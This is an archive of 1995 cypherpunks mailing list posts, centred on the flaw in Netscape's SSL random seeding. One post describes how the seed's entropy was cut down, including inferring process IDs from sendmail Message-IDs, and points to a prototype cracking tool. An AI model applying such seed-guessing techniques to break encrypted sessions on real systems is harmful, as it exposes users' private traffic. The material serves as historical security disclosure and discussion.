THE CYPHERPUNK WEB OF TRUST is absolutely kewl!

We went from cracking a key, to cracking a bigger key, to
CRACKING NETSCAPE inside of one month. How we deal with ENDA
will be NO DIFFERENT, once a WEB OF TRUST IS IN PLACE!

Each signed PGP message extends the WEB OF TRUST. Each new key
means that SEXUAL IDENTITY is as important as SEXUAL ORIENTATION.
It effectively stops the so-in-so told so-in-so told so-in-so
stuff dead cold. And as a result I can now issue two HEADLINES:

CAROL ANNE BEGINS TO EXPAND "TRANSGENDER WEB OF TRUST".

CYPHERPUNKS WATCH CAROL ANNE FLEX PGP'S MUSCLE FOR TRANSGENDER'S.

For when we are in DC, I will help you all make and sign keys.
And when we're done, somebody will go to Phil Z. to sign his/her
key. You can then resign each key, and send it to the keyservers
in total confidence. Then you too, become a munitions dealer.

You will be amazed at who your new friends will become. What 
they will give you. THIS VERY COMPUTER THAT I TYPE ON, IS A
LIVING PROOF THAT THIS WORKS. Go do a whois on bugtown.com,
this will show you where my new box came from. I started the
CYPHERPUNK list with an 8088 at 2400 baud. I'm now at 486/66
at 14.4. And soon they'll have a secure server for me to use.

We have Joe & Jill Sixpack, on the cypherpunk list.
Joe and Jill are typical end users of computers.
I am the embodiment of Jill Sixpack.

The Cypherpunks know I can't write a word of code.
But I can, and do, market the stuff really well.

Cypherpunks, meet the Transgenders. Transgenders, meet the 
Cyperpunks. What you are about to witness is the implementation
of legislation in Washington, using PGP as the information
dissemination vehicle. Something unknown to exist at present.

No Miss XGRRL, we don't need too much money. We now need only
use the weapons at our disposal. They have been bought and paid
for by the blood and sweat of the Cyperpunk Community. They are
as good as having a nuclear missile pointed at THE HUMAN RIGHTS
CAMPAIGN FUND. They are ours for the taking, using and learning.

Just as being transgendered is a learning process, being a
cypherpunk is also a learning process. Washington will be cracked!
And having Pretty Good Privacy (tm) will be a whole lot better
than lots of money and tons of gossip. Transgenders need facts,
because our bodies are at stake. Cypherpunks need facts, because
privacy is at stake. Many privacy rights are at stake in ENDA!

I must end my rant now. Thanks for reading it.

Love Always,

Carol Anne Cypherpunk
9/20/95 3:50 AM CDT



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMF/VdorpjEWs1wBlAQGRZwQAxcplGTgzE6eSyPBYUk9icZUKwqgQhbZu
XhNaRt+iyhvzKPkTBr3kNllPq0V1OxvoDpLp9imJ/MeKuvjq8FTUHO9ezu9que7N
FlByM3JDK8A+GNx+/X6QanpI9Pk+vSAHkraY7ZVn+5CNPvoEhKdNGRxTxlNlHPRH
uNRCh42/ZkY=
=eyGa
-----END PGP SIGNATURE-----
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dawagner@flagstaff.princeton.edu (David A. Wagner)
Date: Wed, 20 Sep 95 00:29:58 PDT
Subject: Re: SSL implementation problem at Netscape
In-Reply-To: <43kki8$os7@charm.magnus.acs.ohio-state.edu>
Message-ID: <43o47v$fsd@cnn.Princeton.EDU>
MIME-Version: 1.0
Content-Type: text/plain


It looks like there's some confusion about the Netscape security problem
Ian Goldberg (iang@cs.berkeley.edu) and I found, as mentioned recently
on cypherpunks.  If we'd foreseen that such a silly bug would receive so
much attention, I think we would've tried to prepare a more comprehensive
description...  But we didn't.

Anyhow, let's see what I can clear up for you now.

[Note: Ian isn't here right now, so he hasn't had a chance to look at this.
Any errors are mine, any opinions are mine, etc.]

In article <david-1909951219130001@192.0.2.1> from sci.crypt,
David Sternlight <david@sternlight.com> wrote:
> If the above is, in fact, accurate it appears to apply to previous
> versions of Netscape, not the 2.0 versions for which the public beta goes
> out next week.

We haven't tried it on v2.0, as we only have a copy of v1.1 right now.
But the front-page New York Times article today said that the next version
also has the same flaw, and that it'll be fixed before release.

A Netscape official press release is available at

	http://www.netscape.com/newsref/std/random_seed_security.html

Also our prototype code can be found at

	ftp://ftp.csua.berkeley.edu/pub/cypherpunks/cryptanalysis/unssl.c

>                In addition the flat statement that "keys can now be found
> in appx 1 min." is not, as it seems, a general one but (if one reads the
> details) requires a number of special assumptions, applies only to some
> machines, and applies only if one can develop certain collateral
> information.

You are partially correct.

It all depends on the threat model.  If the attacker has user-level access
(e.g. an account) on the machine where you run Netscape, your encrypted
sessions can be broken quickly.  (Our tools took about 1 minute on 1
machine, but was just a proof of concept -- I believe the time could be
significantly reduced, and automated completely.)  This model is not
entirely unreasonable IMHO.


If the attacker is simply sniffing the wire somewhere between you and
the https: server, and has no account on your machine, things are a bit
more complicated.  Ian & I are still discussing this case, but I'll
mention a few of our observations:

* the time, pid, and ppid are mixed together in such a way that there
	is certainly no more than 47 bits of entropy (which is a far cry
	from the 128 bits claimed for their commercial domestic version).
* the attacker can guess the current time to within a few seconds easily.
* maybe the attacker can get this down to about 10 msec uncertainty,
	possibly even less in some cases.
* the ppid is often 1 (e.g. when you start up Netscape from a X-windows menu).
* if not 1, the ppid is often just a bit smaller than the pid.
* on personal workstations, the pid and ppid are often quite small.
* one can remotely determine pid's by talking to sendmail on the attacked
	machine and bouncing mail -- the pid will usually be in the Message-ID.
	(if the attacker host runs sendmail, which is a usual case)
	because pids are assigned sequentially, this leaves very little
	uncertainty in Netscape's pid.
* there's no notion of pid or ppid on MS-DOS: God only knows what
	Netscape does there.  maybe it's just seeded from the time!!
* the PRNG is never reseeded for the duration of a cached connection.

While we don't yet know exactly how long it would take to break Netscape's
PRNG in this threat model, I think it's clear that Netscape's current
implementation is insufficient and insecure.


You mention that our attack is only applicable to certain machines.  You
may well be correct -- this is one area where our experiments were still
proceeding when the media descended on us today.  <chuckle>  Certainly the
Solaris 2.0 and HP-UX versions of Netscape v1.1 are vulnerable: we tested
them ourselves.  Ian told me he got email from people who are trying unssl.c
on other architectures, and apparently the SunOS 4.x.x version is vulnerable
too (and tests of other machines are in progress).

We don't know about e.g. PC's yet -- this is another area we were still
working on.  I will note that Netscape didn't try to claim that any version
was safe from this flaw, for what that's worth...

Hopefully this will be quickly fixed by Netscape, and then we can all stop
worrying about it! :-)

David Wagner, daw@cs.berkeley.edu, speaking {for,to} himself




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair"  (Time Keeper) <fair@clock.org>
Date: Wed, 20 Sep 95 04:36:04 PDT
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: Please send me SSL problems...
Message-ID: <v02110104ac85a804545b@[204.179.132.1]>
MIME-Version: 1.0
Content-Type: text/plain


>  I'd just like to let all cypherpunks know that I'm really interested in
>getting any feedback you might have about security problems with Netscape
>products.  I'm particularly interested in bugs in the our implementation
>of SSL, and problems in the protocol that are not addressed in SSL 3.0.
>
>  We have been collecting comments on SSL 3.0, and have started incorporating
>that feedback into our spec.  Please don't assume that our lack of response
>means that we are ignoring your comments.  Between Navigator 2.0 and
>things like the SSL challenge and the RNG fire drill, we just have not had
>the time to get a new rev of the spec out.  Hopefully soon...

Jeff, the SSL specification has a severe *architectural* problem - it
assumes that Internet Protocols are APIs - interface standards, and that
you can just slide a "layer" underneath without anyone noticing. Such is
not the case - all the Internet Protocols are real protocol standards, in
that they specify the syntax, order, and semantics of the actual bits on
the wire. The IETF quite explicitly doesn't care about APIs - that's a host
software issue, and it doesn't matter what the host software looks like (or
even what the machine looks like), so long as it gets the bits on the wire
right, according to the protocol spec. This is how the Internet can make
very strong guarantees about interoperability.

You can't fiddle with a communication protocol without getting agreement
from everyone about the change, or extend it in a way that is compatible
with the protocol you're modifying, on a per-protocol basis (e.g. adding a
TELNET negotiation option to TELNET for encryption, an FTP command to FTP,
etc). Otherwise, all you've done is made a private, non-interoperable
change to an existing protocol that guarantees interoperability *failures*
between systems that implement the existing specification, versus your own
version of HTTP, or TELNET, or whatever. In short, the SSL specification,
as written, proposes to change all Internet application protocols, globally
- "slide in a layer." That's not how it's done, and it's not the right
place to do it, even if it appears to work in an enclave of systems.

About the SSL protocol, encryption algorithms, or the SQA that went into
'em, I think other people have expounded on those issues eloquently, and so
I have nothing to add to that.

Erik Fair






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Wed, 20 Sep 95 02:46:01 PDT
To: sameer <sameer@c2.org>
Subject: Re: response to netscape's press release
In-Reply-To: <199509200336.UAA28871@infinity.c2.org>
Message-ID: <Pine.SUN.3.91.950920054513.8258C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Sep 1995, sameer wrote:
> Netscape secure software has been in use for almost a year on the
> Internet by millions of customers and no thefts of actual customer
> information protected by our security have been reported - this
> posting on the Internet reported a potential vulnerability, not the 
> actual theft of customer information.
> 
>    Yes, Netscape is very lucky that Ian and David are students, and not  
>    criminals. I sincerely hope that the next time someone finds a hole in
>    Netscape that it's someone who would rather win a free T-shirt than  
>    steal lots of money.

I hope exactly the reverse.  It seems the only way the truth will get out 
and heads at Netscape or anywhere else will roll like they should.

Consequences dictate incentives.  No consequence, no incentive to avoid.

> -- 
> sameer						Voice:   510-601-9777
> Community ConneXion				FAX:	 510-601-9734
> An Internet Privacy Provider			Dialin:  510-658-6376
> http://www.c2.org (or login as "guest")			sameer@c2.org
> 

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Tue, 19 Sep 95 22:53:59 PDT
To: cypherpunks@toad.com
Subject: Re: netscape's response
In-Reply-To: <199509192304.QAA05546@infinity.c2.org>
Message-ID: <43oa83$nhm@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509192304.QAA05546@infinity.c2.org>, sameer@c2.org (sameer) writes:
> " With this knowledge, an experienced computer programmer could
> decrypt messages sent by Netscape Navigator to other computers in a
> few hours of computation time."
> 
> 	Excuse me? A few hours? Try 25 seconds??

DISCLAIMER: my comments below are my opinion, and not necessarily the
position of Netscape.

  Yes, it was < 1 minute if you had captured the client-hello message,
and had access to the machine that was running the Navigator, and it
was a unix machine and it was not an SGI with a high-resolution timer.

  If the attacker does not have access to the machine to determine the
pid and ppid, then the attack will take longer.  If the Navigator
is running on an SGI machine with a high resolution cycle counter then
it is used as the first of the two 32bit seeds.

  If the Navigator is running on a Mac or PC, then the two seeds are
the current time and the "tick count", which is milliseconds since starting
windows for the PC version, and some time unit since booting on the Mac.

  I believe that it would take much longer than 1 minute to mount an
attack against a mac, pc, or unix machine that the attacker was not
logged on to.  I don't know exactly how the few hour number was
calculated, since it was done by marketing with input from someone else
in the group.  Another interesting data point is that the unix version,
which was most vulnerable, accounts for less than 10% of our user
base, according to the yahoo random link stats.

  Of course none of this reduces the magnitude of the screw up/bug/design
flaw/whatever.  I really can't say which of these it was since I wasn't
around at the time that this code was being written.  I must admit that
the RNG seed code was not an area that I thought to examine when I took
over our security library.

  This was a bad mistake on our part, and we are working hard to fix it.
We have been trying to identify sources of random bits on PCs, Macs, and
all of the many unix platforms we support.  We are looking at stuff that
is system dependent, user dependent, hardware dependent, random external
sources such as the network and the user.  If anyone has specific
suggestions I would love to hear them so that we can do a better job.

> "Netscape has also begun to engage an external group of world-class
> security experts who will review our solution to this problem before
> it is sent to customers."
> 
> 	A group which offered to review the first version, but
> Netscape refused.

  Do you mean that cypherpunks offered to review the netscape code
if only we made all the source available on the net?  I think that it
is unrealistic to expect us to release all of our source code to the
net.  

  We will be having at least some of our code reviewed by a
wider audience, but I don't yet know which code, or how wide a review
group.  If anyone has specific suggestions for pieces of code that
you would like to see widely reviewed (such as RNG and seed generation)
let me know.

  I realize that some cypherpunks think that we should make all of
our code publicly available.  In an ideal world that would be great,
but we live in a world with politicians, crooks, lawyers, stockholders,
etc...  Don't expect to see us posting our entire security
library source code to cypherpunks.

> 	From their release it looks like they aren't finding a better
> source of entropy, but just using *more* sources of entropy. Doesn't
> mean that the entropy is good.

  I would love to hear your suggestions for good sources of entropy
on any systems that our products run on.

> 	A T-shirt to the first person to decompile the new Seed code
> and post the sources of "entropy" used.

  Is this offer good for netscape employees?  What if I post the code
without having had to decompile it?   :-)

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Wed, 20 Sep 95 02:57:25 PDT
To: Michael Shields <shields@tembel.org>
Subject: Re: Investing on Information We Get Here
In-Reply-To: <m0svJ0W-000DONC@yage.tembel.org>
Message-ID: <Pine.SUN.3.91.950920055340.8258D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Sep 1995, Michael Shields wrote:

> > (These computer lists are really great for investors! I heard about the
> > Apple problems a few days before they hit the street, and was able to
> > unload a bunch of shares at $45, a day before it dropped, now down to
> > around $36. "He who hesitates to act on inside information is lost.")
> 
> This isn't inside information in the illegal-to-trade-on-in-the-US sense,
> is it?  cypherpunks, while maybe not mainstream, is publicly available.

You'd have to argue that reverse engineering was mis-appropriation within 
the meaning of the rules, and that the data was tipped to the tippee's 
with the intent of gain.  In otherwords, you must have a fraud with 
respect to the rightful owner of the "misappropriated" information.  That 
an important commerce system is insecure, be it publicly held or whatever, 
when publically posted, is hardly misappropriation, or if it is alleged 
so, I'll defend the accused (if they are in my jurisdictions of 
license).  

I might add that trading on information that has been released but just 
not propogated to the entire market yet is hardly illegal.

If anyone wants a detailed analysis with cases on the subject, I will 
post to the list with enough interest.

> -- 
> Shields.
> 

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Wed, 20 Sep 95 03:05:21 PDT
To: Censored Girls Anonymous <carolann@censored.org>
Subject: Re: C'Punks meet the T*'s, T*'s meet the C'Punks!
In-Reply-To: <199509200855.BAA25899@usr4.primenet.com>
Message-ID: <Pine.SUN.3.91.950920060416.8258E-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Sep 1995, Censored Girls Anonymous wrote:

> A TRANSGENDER WEB OF TRUST, can and will do more than HRCF ever
> dreamed of. And in no time at all! Once you make and start to 
> sign other persons keys, THEN YOU CAN RELY on what is coming to
> your computer, and THEY CAN RELY on what is coming from you.


Two words.

"Settlement Agreement."

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Wed, 20 Sep 95 06:20:52 PDT
To: liberty@gate.net
Subject: Re: NSA and Netscape Crack
Message-ID: <9509201325.AA24783@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


>>"I'm from the NSA, I'm here to help your crypto..."

The quote should be

"I'n form the NSA, I'm here to help your crypto.  You have where else
to go!"

(apologies to George Lucas)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Wed, 20 Sep 95 06:33:39 PDT
To: liberty@gate.net
Subject: Re: NSA and Netscape Crack
Message-ID: <9509201337.AA24843@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


>"I'n form the NSA, I'm here to help your crypto.  You have where else
>to go!"
 
I've never seen something transformed so.  Talk about munging characters.
 
I'm suprised there are no control characters in this.
 
Whats was meant:
 
"I'm from the NSA, I'm here to help your crypto."  
 
"You have no where else to go!"  (as said by a seven foot robot cop in
black leather).

(and it wasn't even over a MODEM)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Tue, 19 Sep 95 23:49:33 PDT
To: sameer@c2.org (sameer)
Subject: Re: NYT on Netscape Crack
In-Reply-To: <199509190748.AAA03614@infinity.c2.org>
Message-ID: <m0svIx0-000DOGC@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


> 	The server process itself still needs access to that file
> though in order to verify passwords, so it can't be totally
> protected-- a bug in the server might reveal the password file. A
> relatively minor point..

Actually, it could communicate with a differently-privileged process.
The security gain probably isn't worth the performance hit, though.

(A possible secure channel: Give the password manager a uid of its own.
Have it listen on a unix-domain socket.  The server process opens the
socket, then fstat()s it to make sure it's really owned by the password
manager.)
-- 
Shields.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Tue, 19 Sep 95 23:52:11 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Investing on Information We Get Here
In-Reply-To: <ac843ff11a021004a43e@[205.199.118.202]>
Message-ID: <m0svJ0W-000DONC@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


> (These computer lists are really great for investors! I heard about the
> Apple problems a few days before they hit the street, and was able to
> unload a bunch of shares at $45, a day before it dropped, now down to
> around $36. "He who hesitates to act on inside information is lost.")

This isn't inside information in the illegal-to-trade-on-in-the-US sense,
is it?  cypherpunks, while maybe not mainstream, is publicly available.
-- 
Shields.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Wed, 20 Sep 95 00:02:52 PDT
To: tcmay@got.net (Timothy C. May)
Subject: MIME
In-Reply-To: <ac844fed1c0210046617@[205.199.118.202]>
Message-ID: <m0svJAY-000DTXC@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


> I'm dealing with it the same way I'm dealing with the few people who have
> something in their MIME setup that triggers my mailer (Eudora Pro 2.1) to
> treat their text as attachments. Namely, by filtering them out.

Because there were two complaints on this, I'd like to find out why.

I'm using a modified version of Elm, Michael Elkins' 2.4PL24ME4 version.
Among other features, this adds integrated PGP support, and uses the
content-type application/pgp for it.

Here is the complete header on the message I sent, as returned:

: From owner-cypherpunks@toad.com Sun Sep 17 23:26:25 1995
: Return-Path: <owner-cypherpunks@toad.com>
: Received: from relay3.UU.NET by yage.tembel.org with smtp 
: 	(Smail3.1.29.1 #9) id m0suQWm-000HZ2a; Sun, 17 Sep 95 16:41 EDT
: Received: from toad.com by relay3.UU.NET with SMTP 
: 	id QQzhpy19217; Sun, 17 Sep 1995 16:30:47 -0400
: Received: by toad.com id AA23554; Sun, 17 Sep 95 13:28:04 PDT
: Received: from yage.tembel.org by toad.com id AA23543; Sun, 17 Sep 95 13:27:55 PDT
: Received: by yage.tembel.org (Smail3.1.29.1 #9)
: 	id m0suQJV-000HYvC; Sun, 17 Sep 95 20:27 GMT
: Message-Id: <m0suQJV-000HYvC@yage.tembel.org>
: From: shields@tembel.org (Michael Shields)
: Subject: cypherpunks as a newsgroup
: To: cypherpunks@toad.com
: Date: Sun, 17 Sep 1995 20:27:43 +0000 (GMT)
: X-Dogma: Microsoft is not the answer.
:          Microsoft is the question.
:          No is the answer.
: Mime-Version: 1.0
: Content-Type: application/pgp
: Content-Transfer-Encoding: 7bit
: Sender: owner-cypherpunks@toad.com
: Precedence: bulk
: Content-Length: 1092

I think that it must be the content-type that is causing problems, as
the rest of the message is completely standard.  To the people whose
mailers broke out in hives at that message: Do you get the same behavior
with any message having an unknown content-type?
-- 
Shields.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 20 Sep 95 08:09:51 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199509201509.IAA19829@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 5:53 AM 9/20/95, Jeff Weinstein wrote:
>  This was a bad mistake on our part, and we are working hard to fix it.
> We have been trying to identify sources of random bits on PCs, Macs, and
> all of the many unix platforms we 

Maintain a 4K entropy buffer.

Mingle the exact time an place of each mouse hit into the 
entropy buffer using some combination that will have the 
effect of progressively shifting bits all over the place, so that every
noise bit that you get eventually effects every bit of the buffer in a
complicated way.

For example:

        Buf[p] = MouseNoise + Buf[p] + Buf[p-24] + Buf[p-55];
        p = p+1;

(See Knuth, SemiNumerical Algorithms, Book 2, page 27 for the 
magic properties of the numbers 24, 55.   This rule means 
that buffer immediately before p depends in a non linear 
fashion on all the noise you have received.)

Whenever you need a random number, take a one way checksum, 
for example MD5, of the most recently altered part of that 
buffer.  Use that as your random number. 

Whenever the user has used this buffer during a session, then 
when he quits netscape, save the buffer after first hashing 
it.

To hash the buffer without loss of entropy, take the hash of 
one block of the buffer, and XOR it onto the next block (not 
the block that you hashed.)  Repeat for each block in the 
buffer cyclicly.


Publish your random number and encryption code here and in 
sci.crypt.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@iglou.com (Steven Weller)
Date: Wed, 20 Sep 95 07:13:13 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Netscape sub rosa?
Message-ID: <v01530501ac85ddd1205c@[199.171.88.71]>
MIME-Version: 1.0
Content-Type: text/plain


>Gee, where's that "Cypherpunks logo" when you really need it?

From a PR standpoint, this is the best idea of the year.

>A rose covering the Netscape "N" logo? A crypto eagle swooping down and
>pecking at weak keys?

How about a big 200 pin PGA chip with a jagged crack right across it?
Implications of "broken" or "cracked", obviously technical/electronic, and
echoes of Clipper. Throw some streams of ones and zeroes in the background
for good measure.



-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
+1 415 390 9732                    |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@iglou.com                  |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@poboy.b17c.ingr.com (Paul Robichaux)
Date: Wed, 20 Sep 95 05:50:38 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: netscape's response
In-Reply-To: <43oa83$nhm@tera.mcom.com>
Message-ID: <199509201245.AA11962@poboy.b17c.ingr.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Jeff--

First of all, let me commend you for your honesty and forthrightness
in owning up to the problem. I applaud it both as a cypherpunk and as
one of the guys at Intergraph who pushed really hard to get an OEM
agreement with NCC.

>   If the Navigator is running on a Mac or PC, then the two seeds are
> the current time and the "tick count", which is milliseconds since starting
> windows for the PC version, and some time unit since booting on the Mac.

The Mac tick unit is 1/60th of a second, and TickCount() returns the
number of ticks since the system was booted. I think you could safely
narrow the range down to between 0 and (3600 * 24 * 60 =) 5,184,000,
or about 24 bits. That's better than on the Unix boxes, but not
insurmountable.

>   This was a bad mistake on our part, and we are working hard to fix it.
> We have been trying to identify sources of random bits on PCs, Macs, and
> all of the many unix platforms we support.  We are looking at stuff that
> is system dependent, user dependent, hardware dependent, random external
> sources such as the network and the user.  If anyone has specific
> suggestions I would love to hear them so that we can do a better job.

I wouldn't consider the network to be suitably random. How many of
your users are using Netscape over high-latency, low-speed 14.4
PPP/SLIP links? A lot, I'd bet. Not much good-quality randomness
there.

> > "Netscape has also begun to engage an external group of world-class
> > security experts who will review our solution to this problem before
> > it is sent to customers."
> > 
> > 	A group which offered to review the first version, but
> > Netscape refused.

>   Do you mean that cypherpunks offered to review the netscape code
> if only we made all the source available on the net?  I think that it
> is unrealistic to expect us to release all of our source code to the
> net.  

Unrealistic to expect, yes. Unreasonable to ask? Maybe not.

>   I realize that some cypherpunks think that we should make all of
> our code publicly available.  In an ideal world that would be great,
> but we live in a world with politicians, crooks, lawyers, stockholders,
> etc...  Don't expect to see us posting our entire security
> library source code to cypherpunks.

That's probably not the most likely thing-- but why not allow people
with some security & crypto background _from this list_ see the code,
under NDA, for review? Jim Gillogly, Hal Finney, and several others
have show a past talent for that sort of thing.

Frankly, a signed message from, say, Hal saying "I've looked over the
code and it looks pretty good" would carry a lot of water with me. In
turn, I could communicate my warm fuzzy feeling to the dozen or so
people that asked me about the security flaw yesterday, including our
network ops guy.

Cheers,
- -Paul

- -- 
Paul Robichaux, KD4JZG       | "Things are much simpler and less stressful
perobich@ingr.com            |  when you don't look to the law to fix things."
Not speaking for Intergraph  |      - Tim May (tcmay@got.net) on cypherpunks
		 Be a cryptography user. Ask me how.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGANAafb4pLe9tolAQH+uQP7B7XvqVGnN4rDnSNth2PyVio5W5CpuA2U
DgWwjV1DqPJCzA4BmM3/rRlYYG8Z2d50i5zb0XD6XbMi6bpkc9fGBZ6156p7sKa1
DDk8hWAr+BvIcuYTC2irRTee7462YBjsBvwOiFVV+0/Wdbg2gjGfPgcmsxmzqi4R
Tby1/d2Pr6c=
=xm2W
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Wed, 20 Sep 95 05:49:32 PDT
To: Bill Sommerfeld <sommerfeld@orchard.medford.ma.us>
Subject: Re: My Day
In-Reply-To: <43oquc$70f@tera.mcom.com>
Message-ID: <9509201248.AA09892@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Bill Sommerfeld writes:
 > >   the second 32bit seed is the "tick count", which I'm told is the number of
 > > milliseconds since windows started.
 > 
 > A 32-bit ms-resolution counter wraps roughly every 50 days.  Very few
 > Windoze PC's stay up that long :-).

Also (and note that it's been a while since I've messed around with
PC's, but since the "architecture" remains chained to an early-80's
design I suspect they're still the same) the PC clock frequency is
generally pretty low.  PC UNIX implementations usually run it at about
100 Hz, I think.  There aren't a lot of available timers on the PC.
One of them used to be used as the DRAM refresh timer; I don't know
whether they still do that.

On the other hand, getting at a Windows PC over the network is a whole
'nuther enchilada, though if I want to keep my day job I need to get
that figured out real soon now.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob L <robl@on-ramp.ior.com>
Date: Wed, 20 Sep 95 07:54:16 PDT
To: perobich@ingr.com
Subject: [NOISE] Re: Cylink
In-Reply-To: <199509201343.AA12329@poboy.b17c.ingr.com>
Message-ID: <Pine.LNX.3.91.950920075230.32738A-100000@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain




> What about Roger Schlafly's suit? Anything new on it?
> - -Paul

Some pin stripping and a spot of tomato soup.. <g>

(sorry.. couldn't pass it up..




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Wed, 20 Sep 95 05:11:07 PDT
To: cypherpunks@toad.com
Subject: Re: netscape's response
Message-ID: <29391.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


  "Jeff Weinstein" <jsw@netscape.com>  writes:

> The issue is that any statement that only mentions the 1 minute figure
> is only stating part of the story, just as a statement giving a figure
> of several hours is only mentioning a part of the story.  All of the
> news articles I've seen (not an exhaustive sample) have only mentioned
> the 1 minute number, which only really effects a relatively small
> number of our customers.

The Washington Post ran an article today in the Business section. Its
byline said Elizabeth Corcoran.  It refered to the four hour attack figure.
It appeared to be mostly a rewrite of the Netscape press release -- nearly
no quotes, no quoted local sources (TIS, Denning, etc.)

I expect that many papers that are far from Silicon Valley will
print it with a similar spin.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 20 Sep 95 05:12:05 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: NYT on Netscape Crack
In-Reply-To: <155.9509191654@exe.dcs.exeter.ac.uk>
Message-ID: <199509201211.IAA04771@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



aba@atlas.ex.ac.uk writes:
> Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com> writes:
> > Oh, can we now expect to see source to at least the security portions of  
> > Navigator and the Commerce server?

> An excellent proposal.

Not especially usefull. The bulk of the security problems won't
obviously have anything to do with the "security" portion of the code.

> Save Ian and David the effort of reverse engineering it again (which
> it is obviously pointless, and more: mathematically impossible, to do),

